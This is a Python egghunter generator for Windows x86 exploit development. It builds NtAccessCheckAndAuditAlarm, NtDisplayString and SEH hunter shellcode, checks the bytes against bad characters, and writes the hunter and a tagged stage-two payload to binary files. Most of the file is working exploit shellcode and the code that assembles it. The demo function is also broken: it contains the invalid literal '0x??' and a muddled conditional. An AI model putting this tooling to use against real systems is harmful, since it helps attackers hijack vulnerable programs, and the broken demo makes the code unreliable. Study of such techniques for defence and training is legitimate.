#!/usr/bin/env python3
from __future__ import annotations

from dataclasses import dataclass
from pathlib import Path
from typing import Callable, Dict, Iterable, List, Optional, Tuple


class EgghunterError(Exception):
    """Base error for egghunter generation."""


class BadCharError(EgghunterError):
    """Raised when generated bytes contain excluded characters."""


class SelectionError(EgghunterError):
    """Raised when no hunter variant satisfies the requested constraints."""


@dataclass(frozen=True)
class HunterCandidate:
    name: str
    shellcode: bytes
    size: int
    uses_syscall: bool
    arch: str = "x86"


def to_hex_escaped(buf: bytes) -> str:
    return "".join(f"\\x{b:02x}" for b in buf)


def write_raw(path: str | Path, data: bytes) -> Path:
    out = Path(path)
    out.write_bytes(data)
    return out


def normalize_badchars(excluded: bytes | Iterable[int]) -> bytes:
    if isinstance(excluded, bytes):
        vals = list(excluded)
    else:
        vals = [int(x) & 0xFF for x in excluded]
    return bytes(sorted(set(vals)))


def validate_badchars(buf: bytes, excluded: bytes | Iterable[int]) -> None:
    badchars = normalize_badchars(excluded)
    hits = sorted(set(buf) & set(badchars))
    if hits:
        rendered = " ".join(f"{b:02x}" for b in hits)
        raise BadCharError(f"Generated hunter contains excluded byte(s): {rendered}")


def build_egg(tag: bytes = b"W00T") -> bytes:
    if len(tag) != 4:
        raise ValueError("Tag must be exactly 4 bytes")
    return tag + tag


def _pack32(value: int) -> bytes:
    if not (0 <= value <= 0xFFFFFFFF):
        raise ValueError("32-bit value out of range")
    return value.to_bytes(4, "little", signed=False)


def _encode_syscall_push_or_neg(syscall_id: int, excluded: bytes) -> bytes:
    """
    Emit shellcode that loads EAX with syscall_id while avoiding excluded bytes.

    Preferred form:
        push imm8 ; pop eax
    Fallback:
        mov eax, negated_imm32 ; neg eax
    """
    if 0 <= syscall_id <= 0x7F:
        candidate = b"\x6a" + bytes([syscall_id]) + b"\x58"
        validate_badchars(candidate, excluded)
        return candidate

    neg_val = (0x100000000 - syscall_id) & 0xFFFFFFFF
    candidate = b"\xB8" + _pack32(neg_val) + b"\xF7\xD8"
    validate_badchars(candidate, excluded)
    return candidate


def hunter_x86_ntaccess(
    tag: bytes,
    syscall_id: int = 0x02,
    excluded: bytes = b"",
) -> bytes:
    """
    Classic x86 NtAccessCheckAndAuditAlarm hunter.
    Dynamically encodes the syscall load to avoid badchars.
    """
    if len(tag) != 4:
        raise ValueError("Tag must be exactly 4 bytes")

    syscall_load = _encode_syscall_push_or_neg(syscall_id, normalize_badchars(excluded))

    shellcode = (
        b"\x66\x81\xca\xff\x0f"   # or dx,0xfff
        b"\x42"                   # inc edx
        b"\x52"                   # push edx
        + syscall_load +
        b"\xcd\x2e"               # int 0x2e
        b"\x3c\x05"               # cmp al,5
        b"\x5a"                   # pop edx
        b"\x74"                   # je short ...
    )

    # The short jump distance depends on the syscall loader size.
    # For:
    #   push imm8/pop eax  => 3 bytes, classic offset = 0xEF
    #   mov eax,imm32/neg  => 7 bytes, adjusted offset = 0xEB
    if len(syscall_load) == 3:
        shellcode += b"\xef"
    elif len(syscall_load) == 7:
        shellcode += b"\xeb"
    else:
        raise EgghunterError("Unexpected syscall loader size")

    shellcode += (
        b"\xb8" + tag +           # mov eax,<tag little-endian already expected by caller convention below>
        b"\x89\xd7"               # mov edi,edx
        b"\xaf"                   # scasd
        b"\x75"                   # jne short ...
    )

    if len(syscall_load) == 3:
        shellcode += b"\xea"
    else:
        shellcode += b"\xe6"

    shellcode += (
        b"\xaf"                   # scasd
        b"\x75"                   # jne short ...
    )

    if len(syscall_load) == 3:
        shellcode += b"\xe7"
    else:
        shellcode += b"\xe3"

    shellcode += b"\xff\xe7"      # jmp edi

    validate_badchars(shellcode, excluded)
    return shellcode


def hunter_x86_ntdisplaystring(
    tag: bytes,
    syscall_id: int = 0x43,
    excluded: bytes = b"",
) -> bytes:
    """
    NtDisplayString hunter.
    Structurally identical to ntaccess except for syscall selector.
    """
    return hunter_x86_ntaccess(tag=tag, syscall_id=syscall_id, excluded=excluded)


def hunter_x86_seh(tag: bytes, excluded: bytes = b"") -> bytes:
    """
    Classic x86 SEH egghunter.

    This is the canonical fixed-byte SEH hunter widely used in exploit dev.
    It installs its own _EXCEPTION_REGISTRATION_RECORD, intentionally faults
    on invalid memory during the scan, then rewrites EIP in the exception
    CONTEXT to resume at the next page.
    """
    if len(tag) != 4:
        raise ValueError("Tag must be exactly 4 bytes")

    shellcode = (
        b"\xeb\x21"               # jmp get_seh_address
        b"\x59"                   # pop ecx
        b"\xb8" + tag +           # mov eax,<tag little-endian expected by caller>
        b"\x51"                   # push ecx
        b"\x6a\xff"               # push -1
        b"\x33\xdb"               # xor ebx,ebx
        b"\x64\x89\x23"           # mov fs:[ebx],esp
        b"\x6a\x02"               # push 2
        b"\x59"                   # pop ecx
        b"\x8b\xfb"               # mov edi,ebx
        b"\xf3\xaf"               # repe scasd
        b"\x75\x07"               # jne loop_inc_one
        b"\xff\xe7"               # jmp edi
        b"\x66\x81\xcb\xff\x0f"   # or bx,0xfff
        b"\x43"                   # inc ebx
        b"\xeb\xed"               # jmp is_egg
        b"\xe8\xda\xff\xff\xff"   # call build_exception_record
        b"\x6a\x0c"               # push 0xc
        b"\x59"                   # pop ecx
        b"\x8b\x04\x0c"           # mov eax,[esp+ecx]
        b"\xb1\xb8"               # mov cl,0xb8
        b"\x83\x04\x08\x06"       # add dword ptr [eax+ecx],0x06
        b"\x58"                   # pop eax
        b"\x83\xc4\x10"           # add esp,0x10
        b"\x50"                   # push eax
        b"\x33\xc0"               # xor eax,eax
        b"\xc3"                   # ret
    )

    validate_badchars(shellcode, excluded)
    return shellcode


def choose_hunter(
    tag: bytes = b"W00T",
    *,
    excluded: bytes = b"",
    max_size: Optional[int] = None,
    prefer_seh: bool = False,
    ntaccess_syscall_id: int = 0x02,
    ntdisplaystring_syscall_id: int = 0x43,
    allow_variants: Optional[List[str]] = None,
) -> HunterCandidate:
    """
    Auto-select the best egghunter for the current constraints.

    Selection policy:
    - If prefer_seh is False:
      1. ntaccess
      2. ntdisplaystring
      3. seh
    - If prefer_seh is True:
      1. seh
      2. ntaccess
      3. ntdisplaystring
    """
    if len(tag) != 4:
        raise ValueError("Tag must be exactly 4 bytes")

    excluded = normalize_badchars(excluded)

    builders: List[Tuple[str, Callable[[], bytes], bool]] = [
        (
            "x86_ntaccess",
            lambda: hunter_x86_ntaccess(tag=tag, syscall_id=ntaccess_syscall_id, excluded=excluded),
            True,
        ),
        (
            "x86_ntdisplaystring",
            lambda: hunter_x86_ntdisplaystring(
                tag=tag,
                syscall_id=ntdisplaystring_syscall_id,
                excluded=excluded,
            ),
            True,
        ),
        (
            "x86_seh",
            lambda: hunter_x86_seh(tag=tag, excluded=excluded),
            False,
        ),
    ]

    if prefer_seh:
        builders = [builders[2], builders[0], builders[1]]

    if allow_variants is not None:
        allowed = set(allow_variants)
        builders = [entry for entry in builders if entry[0] in allowed]

    errors: List[str] = []

    for name, builder, uses_syscall in builders:
        try:
            shellcode = builder()
            size = len(shellcode)

            if max_size is not None and size > max_size:
                errors.append(f"{name}: size {size} exceeds max_size={max_size}")
                continue

            return HunterCandidate(
                name=name,
                shellcode=shellcode,
                size=size,
                uses_syscall=uses_syscall,
            )
        except Exception as exc:
            errors.append(f"{name}: {exc}")

    raise SelectionError("No valid egghunter found. " + " | ".join(errors))


def build_stage2(tag: bytes, payload: bytes) -> bytes:
    return build_egg(tag) + payload


def demo() -> None:
    tag = b"w00t"  # common little-endian-friendly tag in exploit dev
    badchars = b"\x00\x0a\x0d"

    selected = choose_hunter(
        tag=tag,
        excluded=badchars,
        max_size=80,
        prefer_seh=False,
        ntaccess_syscall_id=0x1C6,      # example Win10 value
        ntdisplaystring_syscall_id=0x?? # replace if you resolve dynamically
        if False else 0x43,             # placeholder default
    )

    print(f"[+] Selected: {selected.name}")
    print(f"[+] Size: {selected.size}")
    print(f"[+] Uses syscall: {selected.uses_syscall}")
    print(f"[+] Hunter bytes: b\"{to_hex_escaped(selected.shellcode)}\"")

    payload = b"\x90" * 32
    stage2 = build_stage2(tag, payload)

    write_raw("hunter.bin", selected.shellcode)
    write_raw("stage2.bin", stage2)
    print("[+] Wrote hunter.bin and stage2.bin")


if __name__ == "__main__":
    demo()